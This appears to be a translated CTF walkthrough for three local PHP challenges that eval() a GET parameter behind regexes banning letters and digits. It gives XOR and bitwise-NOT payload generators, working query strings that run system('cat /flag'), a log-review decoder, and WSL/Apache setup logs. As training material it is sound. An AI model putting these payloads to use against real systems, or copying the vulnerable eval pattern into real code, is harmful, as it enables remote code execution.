
RCE CTF Challenges: Environment Setup and Solution Walkthrough, Part 4

1 Deployment in an Ubuntu environment under WSL

2 Challenges

2.1 http://localhost/rce3/rce3_1.php

<?php
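highlight_file(__FILE__);  // Highlight and display the source of the current file
if(!preg_match('/[a-z0-9~]/is', $_GET['code'])) {  // Check whether the `code` parameter contains a letter, a digit, or the bitwise NOT operator (~)
    eval($_GET['code']);  // If it contains none of these, execute the contents of the `code` parameter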
}
?>

2.2 http://localhost/rce3/rce3_2.php

<?php
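highlight_file(__FILE__);  // Highlight and display the source of the current file
if(!preg_match('/[a-z0-9\^]/is', $_GET['code'])) {  // Check whether the `code` parameter contains a letter, a digit, or the XOR operator (^)
    eval($_GET['code']);  // If it contains none of these, execute the contents of the `code` parameter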
}
?>

2.3 http://localhost/rce3/rce3_3.php

<?php
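highlight_file(__FILE__);  // Highlight and display the source of the current file
if(!preg_match('/[a-z0-9]/is', $_GET['code'])) {  // Check whether the `code` parameter contains a letter or a digit
    eval($_GET['code']);  // If it contains neither, execute the contents of the `code` parameter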
}
?>


3 EXP

3.1.1 RCE without letters, digits, or bitwise NOT (~)


3.1.2 Building the payload with xor.py

system -> ("((%-<br>[[[\@@ -> "(\"((%-"^"[[[\@@"
cat -> #!(<br>@@\ -> "#!("^"@@\\"
flag -> &,!'<br>@@@@ -> "&,!'"^"@@@@"

<?php
error_reporting(0);
$shell = "system";  // Target string to encode
$result1 = "";
$result2 = "";
// For each character, find the first pair of printable, non-alphanumeric
// characters whose XOR equals it.
for ($num = 0; $num < strlen($shell); $num++) {
    for ($x = 33; $x <= 126; $x++) {
        if (judge(chr($x))) {
            for ($y = 33; $y <= 126; $y++) {
                if (judge(chr($y))) {
                    $f = chr($x) ^ chr($y);
                    if ($f == $shell[$num]) {
                        $result1 .= chr($x);
                        $result2 .= chr($y);
                        break 2;
                    }
                }
            }
        }
    }
}
echo $result1;
echo "<br>";
echo $result2;

// Returns true when $c is neither a letter nor a digit.
function judge($c)
{
    if (!preg_match('/[a-z0-9]/is', $c)) {
        return true;
    }
    return false;
}

3.1.3

?code=("(\"((%-"^"[[[\@@")(("%23!("^"@@\\")."%20/".("%26,!'"^"@@@@"));


3.2.1 RCE without letters, digits, or XOR (^)


3.2.2 Building the payload with qufan.py

<?php
echo urlencode(~"system");
echo "\n";
echo urlencode(~"ls /");
//(~%8C%86%8C%8B%9A%92)(~%93%8C%DF%D0);
echo "\n";
echo urlencode(~"system");
echo "\n";
echo urlencode(~"cat /flag");
//(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%93%9E%98);

3.2.3

?code=(~%8C%86%8C%8B%9A%92)(~%93%8C%DF%D0);


3.2.4

?code=(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%93%9E%98);


3.3 RCE without letters or digits

Either of the two methods above solves it.
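When reviewing request logs, both payload styles above can be recognised by their shape and resolved back to plain text. The following Python sketch is an added example, not part of the original post; the function names and the benign sample are assumptions, and the two payload samples are the values from sections 3.1.3 and 3.2.4.

```python
import re
from urllib.parse import unquote_to_bytes

# Values of the `code` parameter copied from sections 3.1.3 and 3.2.4 of this
# page, plus one constructed benign value for contrast.
XOR_SAMPLE = r'''("(\"((%-"^"[[[\@@")(("%23!("^"@@\\")."%20/".("%26,!'"^"@@@@"));'''
NOT_SAMPLE = "(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%93%9E%98);"
BENIGN_SAMPLE = "echo%201;"  # constructed

# "left"^"right": two PHP double-quoted literals joined by the XOR operator.
XOR_PAIR = re.compile(rb'"((?:[^"\\]|\\.)*)"\^"((?:[^"\\]|\\.)*)"', re.S)
# ~ followed by a run of high bytes, as produced by urlencode(~"text").
NOT_RUN = re.compile(rb'~([\x80-\xff]+)')


def php_unescape(literal: bytes) -> bytes:
    # Undo the backslash escapes for quote, backslash and dollar sign in a PHP
    # double-quoted literal. Letter escapes cannot occur in a payload that
    # contains no letters, so they are not handled here.
    return re.sub(rb'\\(["\\$])', rb'\1', literal)


def _xor(m: re.Match) -> bytes:
    left, right = php_unescape(m.group(1)), php_unescape(m.group(2))
    # PHP XORs strings byte by byte and truncates to the shorter operand.
    return b'"' + bytes(a ^ b for a, b in zip(left, right)) + b'"'


def _not(m: re.Match) -> bytes:
    # Bitwise NOT of each byte restores the original text.
    return b'"' + bytes(b ^ 0xFF for b in m.group(1)) + b'"'


def analyse(param_value: str) -> dict:
    """Flag an alphanumeric-free operator payload and show what it evaluates to."""
    raw = unquote_to_bytes(param_value)
    has_operator_strings = bool(XOR_PAIR.search(raw) or NOT_RUN.search(raw))
    suspicious = has_operator_strings and not re.search(rb'[A-Za-z0-9]', raw)
    resolved = NOT_RUN.sub(_not, XOR_PAIR.sub(_xor, raw))
    return {"suspicious": suspicious, "resolved": resolved.decode("latin-1")}


if __name__ == "__main__":
    for sample in (XOR_SAMPLE, NOT_SAMPLE, BENIGN_SAMPLE):
        print(analyse(sample))
```

The `suspicious` flag is a heuristic for log review, not a filter: the three challenges show that rejecting characters in front of `eval` does not hold, so the durable fix is to stop passing request data to `eval`.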

Switching to PHP 7.1

(base) gpu3090@DESKTOP-8IU6393:/$ sudo apt-get install php7.1
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following additional packages will be installed:
  libapache2-mod-php7.1 libpcre3 php7.1-cli php7.1-common php7.1-json php7.1-opcache php7.1-readline
Suggested packages:
  php-pear
The following NEW packages will be installed:
  libapache2-mod-php7.1 libpcre3 php7.1 php7.1-cli php7.1-common php7.1-json php7.1-opcache php7.1-readline
0 upgraded, 8 newly installed, 0 to remove and 2 not upgraded.
Need to get 3997 kB of archives.
After this operation, 15.0 MB of additional disk space will be used.
Do you want to continue? [Y/n]
Get:1 http://archive.ubuntu.com/ubuntu noble/universe amd64 libpcre3 amd64 2:8.39-15build1 [248 kB]
Get:2 https://ppa.launchpadcontent.net/ondrej/php/ubuntu noble/main amd64 php7.1-common amd64 7.1.33-67+ubuntu24.04.1+deb.sury.org+1 [579 kB]
Get:3 https://ppa.launchpadcontent.net/ondrej/php/ubuntu noble/main amd64 php7.1-json amd64 7.1.33-67+ubuntu24.04.1+deb.sury.org+1 [19.4 kB]
Get:4 https://ppa.launchpadcontent.net/ondrej/php/ubuntu noble/main amd64 php7.1-opcache amd64 7.1.33-67+ubuntu24.04.1+deb.sury.org+1 [164 kB]
Get:5 https://ppa.launchpadcontent.net/ondrej/php/ubuntu noble/main amd64 php7.1-readline amd64 7.1.33-67+ubuntu24.04.1+deb.sury.org+1 [13.4 kB]
Get:6 https://ppa.launchpadcontent.net/ondrej/php/ubuntu noble/main amd64 php7.1-cli amd64 7.1.33-67+ubuntu24.04.1+deb.sury.org+1 [1489 kB]
Get:7 https://ppa.launchpadcontent.net/ondrej/php/ubuntu noble/main amd64 libapache2-mod-php7.1 amd64 7.1.33-67+ubuntu24.04.1+deb.sury.org+1 [1418 kB]
Get:8 https://ppa.launchpadcontent.net/ondrej/php/ubuntu noble/main amd64 php7.1 all 7.1.33-67+ubuntu24.04.1+deb.sury.org+1 [66.0 kB]
Fetched 3997 kB in 55s (73.2 kB/s)
Selecting previously unselected package libpcre3:amd64.
(Reading database ... 43387 files and directories currently installed.)
Preparing to unpack .../0-libpcre3_2%3a8.39-15build1_amd64.deb ...
Unpacking libpcre3:amd64 (2:8.39-15build1) ...
Selecting previously unselected package php7.1-common.
Preparing to unpack .../1-php7.1-common_7.1.33-67+ubuntu24.04.1+deb.sury.org+1_amd64.deb ...
Unpacking php7.1-common (7.1.33-67+ubuntu24.04.1+deb.sury.org+1) ...
Selecting previously unselected package php7.1-json.
Preparing to unpack .../2-php7.1-json_7.1.33-67+ubuntu24.04.1+deb.sury.org+1_amd64.deb ...
Unpacking php7.1-json (7.1.33-67+ubuntu24.04.1+deb.sury.org+1) ...
Selecting previously unselected package php7.1-opcache.
Preparing to unpack .../3-php7.1-opcache_7.1.33-67+ubuntu24.04.1+deb.sury.org+1_amd64.deb ...
Unpacking php7.1-opcache (7.1.33-67+ubuntu24.04.1+deb.sury.org+1) ...
Selecting previously unselected package php7.1-readline.
Preparing to unpack .../4-php7.1-readline_7.1.33-67+ubuntu24.04.1+deb.sury.org+1_amd64.deb ...
Unpacking php7.1-readline (7.1.33-67+ubuntu24.04.1+deb.sury.org+1) ...
Selecting previously unselected package php7.1-cli.
Preparing to unpack .../5-php7.1-cli_7.1.33-67+ubuntu24.04.1+deb.sury.org+1_amd64.deb ...
Unpacking php7.1-cli (7.1.33-67+ubuntu24.04.1+deb.sury.org+1) ...
Selecting previously unselected package libapache2-mod-php7.1.
Preparing to unpack .../6-libapache2-mod-php7.1_7.1.33-67+ubuntu24.04.1+deb.sury.org+1_amd64.deb ...
Unpacking libapache2-mod-php7.1 (7.1.33-67+ubuntu24.04.1+deb.sury.org+1) ...
Selecting previously unselected package php7.1.
Preparing to unpack .../7-php7.1_7.1.33-67+ubuntu24.04.1+deb.sury.org+1_all.deb ...
Unpacking php7.1 (7.1.33-67+ubuntu24.04.1+deb.sury.org+1) ...
Setting up libpcre3:amd64 (2:8.39-15build1) ...
Setting up php7.1-common (7.1.33-67+ubuntu24.04.1+deb.sury.org+1) ...
Creating config file /etc/php/7.1/mods-available/calendar.ini with new version
Creating config file /etc/php/7.1/mods-available/ctype.ini with new version
Creating config file /etc/php/7.1/mods-available/exif.ini with new version
Creating config file /etc/php/7.1/mods-available/fileinfo.ini with new version
Creating config file /etc/php/7.1/mods-available/ftp.ini with new version
Creating config file /etc/php/7.1/mods-available/gettext.ini with new version
Creating config file /etc/php/7.1/mods-available/iconv.ini with new version
Creating config file /etc/php/7.1/mods-available/pdo.ini with new version
Creating config file /etc/php/7.1/mods-available/phar.ini with new version
Creating config file /etc/php/7.1/mods-available/posix.ini with new version
Creating config file /etc/php/7.1/mods-available/shmop.ini with new version
Creating config file /etc/php/7.1/mods-available/sockets.ini with new version
Creating config file /etc/php/7.1/mods-available/sysvmsg.ini with new version
Creating config file /etc/php/7.1/mods-available/sysvsem.ini with new version
Creating config file /etc/php/7.1/mods-available/sysvshm.ini with new version
Creating config file /etc/php/7.1/mods-available/tokenizer.ini with new version
Setting up php7.1-opcache (7.1.33-67+ubuntu24.04.1+deb.sury.org+1) ...
Creating config file /etc/php/7.1/mods-available/opcache.ini with new version
Setting up php7.1-readline (7.1.33-67+ubuntu24.04.1+deb.sury.org+1) ...
Creating config file /etc/php/7.1/mods-available/readline.ini with new version
Setting up php7.1-json (7.1.33-67+ubuntu24.04.1+deb.sury.org+1) ...
Creating config file /etc/php/7.1/mods-available/json.ini with new version
Setting up php7.1-cli (7.1.33-67+ubuntu24.04.1+deb.sury.org+1) ...
Creating config file /etc/php/7.1/cli/php.ini with new version
Setting up libapache2-mod-php7.1 (7.1.33-67+ubuntu24.04.1+deb.sury.org+1) ...
Creating config file /etc/php/7.1/apache2/php.ini with new version
libapache2-mod-php7.1: php7.3 module already enabled, not enabling PHP 7.1
Setting up php7.1 (7.1.33-67+ubuntu24.04.1+deb.sury.org+1) ...
Processing triggers for libc-bin (2.39-0ubuntu8.5) ...
Processing triggers for man-db (2.12.0-4build2) ...
Processing triggers for php7.1-cli (7.1.33-67+ubuntu24.04.1+deb.sury.org+1) ...
Processing triggers for libapache2-mod-php7.1 (7.1.33-67+ubuntu24.04.1+deb.sury.org+1) ...
(base) gpu3090@DESKTOP-8IU6393:/$ php -v
PHP 7.3.33-24+ubuntu24.04.1+deb.sury.org+1 (cli) (built: Dec 24 2024 07:05:25) ( NTS )
Copyright (c) 1997-2018 The PHP Group
Zend Engine v3.3.33, Copyright (c) 1998-2018 Zend Technologies
    with Zend OPcache v7.3.33-24+ubuntu24.04.1+deb.sury.org+1, Copyright (c) 1999-2018, by Zend Technologies
(base) gpu3090@DESKTOP-8IU6393:/$ sudo update-alternatives --config php
There are 3 choices for the alternative php (providing /usr/bin/php).

  Selection    Path             Priority   Status
------------------------------------------------------------
  0            /usr/bin/php7.4   74        auto mode
  1            /usr/bin/php7.1   71        manual mode
* 2            /usr/bin/php7.3   73        manual mode
  3            /usr/bin/php7.4   74        manual mode

Press <enter> to keep the current choice[*], or type selection number: 1
update-alternatives: using /usr/bin/php7.1 to provide /usr/bin/php (php) in manual mode
(base) gpu3090@DESKTOP-8IU6393:/$ php -v
PHP 7.1.33-67+ubuntu24.04.1+deb.sury.org+1 (cli) (built: Dec 24 2024 06:50:54) ( NTS )
Copyright (c) 1997-2018 The PHP Group
Zend Engine v3.1.0, Copyright (c) 1998-2018 Zend Technologies
    with Zend OPcache v7.1.33-67+ubuntu24.04.1+deb.sury.org+1, Copyright (c) 1999-2018, by Zend Technologies
(base) gpu3090@DESKTOP-8IU6393:/$ sudo systemctl restart apache2
(base) gpu3090@DESKTOP-8IU6393:/$ sudo a2enmod php7.1
Considering dependency mpm_prefork for php7.1:
Considering conflict mpm_event for mpm_prefork:
Considering conflict mpm_worker for mpm_prefork:
Module mpm_prefork already enabled
Considering conflict php5 for php7.1:
Enabling module php7.1.
To activate the new configuration, you need to run:
  systemctl restart apache2
(base) gpu3090@DESKTOP-8IU6393:/$ systemctl restart apache2
Failed to restart apache2.service: Interactive authentication required.
See system logs and 'systemctl status apache2.service' for details.
(base) gpu3090@DESKTOP-8IU6393:/$ sudo systemctl restart apache2
(base) gpu3090@DESKTOP-8IU6393:/$

4 Deploying the environment

4.0.1 Installing PHP on Ubuntu under WSL

Step 1: Remove Existing PHP Versions
First, let's clean up any existing PHP 7.x installations:
sudo apt-get purge 'php7.*'
sudo apt-get autoclean
sudo apt-get autoremove
Note about these commands:
autoclean removes obsolete package files from your cache
autoremove removes dependencies that are no longer needed
Using purge removes both packages and their configuration files
Step 2: Add the PHP Repository
Ondřej Surý maintains up-to-date PHP packages for Ubuntu:
sudo add-apt-repository ppa:ondrej/php
sudo apt-get update
Step 3: Install PHP 7.3
Now install PHP 7.3 and common extensions:
sudo apt-get install php7.3
Step 4: Configure Apache (if using Apache)
If you're using Apache as your web server:
# Disable old PHP module (if any)
sudo a2dismod php7.0  # or whatever version you had before
# Enable PHP 7.3
sudo a2enmod php7.3
sudo systemctl restart apache2

4.0.2 Giving a regular account read, write, and execute permissions on /var/www/html

(base) gpu3090@DESKTOP-8IU6393:~$ chown  gpu3090 /var/www/html
chown: changing ownership of '/var/www/html': Operation not permitted
(base) gpu3090@DESKTOP-8IU6393:~$ sudo chown  gpu3090 /var/www/html
(base) gpu3090@DESKTOP-8IU6393:~$ ls
M5-应用集成  anaconda3  cookies.txt  downloads  snap  summaries  tmpg00x95ve.mp3
(base) gpu3090@DESKTOP-8IU6393:~$

4.0.3 Placing the challenge code and the flag in the corresponding locations under /var/www/html/


4.1 Running the EXP PHP scripts above in VS Code

The PHP Debug and PHP Server extensions need to be installed.
